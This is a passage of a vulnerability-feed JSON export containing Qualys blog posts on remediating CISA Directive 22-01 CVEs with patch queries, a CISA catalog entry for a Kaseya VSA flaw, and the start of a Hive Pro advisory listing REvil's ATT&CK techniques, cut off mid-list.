Vendor:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture5.png)\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture6.jpg)\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture7.jpg)\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Kaseya VSA Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-30116", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202124.pdf>).\n\nThe REvil ransomware group was successful in carrying out a supply chain attack by exploiting the zero-day vulnerability (CVE-2021-30116) in the Kaseya VSA server and delivering a malicious script to all the computer devices managed by servers. The script delivered the REvil ransomware and encrypted the files of the clients managed by the server affecting almost 1 million computer devices.\n\nHive Pro researchers have identified that there are three more zero-day vulnerabilities that were possibly used to target the clients:\n\n * Authentication Bypass Vulnerability\n * Arbitrary File Upload Vulnerability\n * Code Injection Vulnerability\n\n**The Techniques used by the REvil ransomware includes:**\n\n * TA0001: Initial Access\n * T1189: Drive-by Compromise\n * T1566: Phishing\n * T1566.001: Spear phishing Attachment\n * TA0002: Execution\n * T1059: Command and Scripting Interpreter\n * T1106: Native API\n * T1059.001: PowerShell\n * T1059.005: Visual Basic\n * T1059.003: Windows Command Shell\n * TA0003: Persistence\n * T1204: User Execution\n * T1047: Windows Management Instrumentation\n * T1204.002: Malicious File\n * TA0004: Privilege Escalation\n * T1134: Access Token Manipulation\n * T1134.002: Create Process with Token\n * T1134.001: Token Impersonation/Theft\n * T1574:Hijack Execution Flow\n * T1574.002:Hijack Execution Flow: DLL Side-Loading\n * TA0005: Defense Evasion\n * T1134: Access Token Manipulation\n * T1134.002: Create Process with Token\n * T1134.001: Token Impersonation/Theft\n * T1140: DE obfuscate/Decode Files or Information\n * T1055: Process Injection\n * TA0006: Credential Access\n * T1562: Impair Defenses\n * T1562.001: Disable or Modify Tools\n * T1070: Indicator Removal on Host\n * T1070.004: File Deletion\n * T1036: Masquerading\n * T1036.005: Match Legitimate Name or Location\n * T1112: Modify Registry\n * T1027: Obfuscated Files or Information\n * T1055: Process Injection\n * TA0007: Discovery\n * T1083: File and Directory Discovery\n * TA0008: Lateral Movement\n * T1069: Permission Groups Discovery\n * T1069.002: Domain Groups\n * T1012: Query Registry\n * T1082: System Information Discovery\n * TA0011: Command and Control\n * T1071: Application Layer Protocol\n * T1071.001: Web Protocols \n * T1573: Encrypted Channel \n * T1573.002: Asymmetric Cryptography\n * T1105: Ingress Tool Transfer\n * TA0010: Exfiltration\n * T1041: Exfiltration Over C2 Channel\n * TA0040: Impact\n * T1485: Data 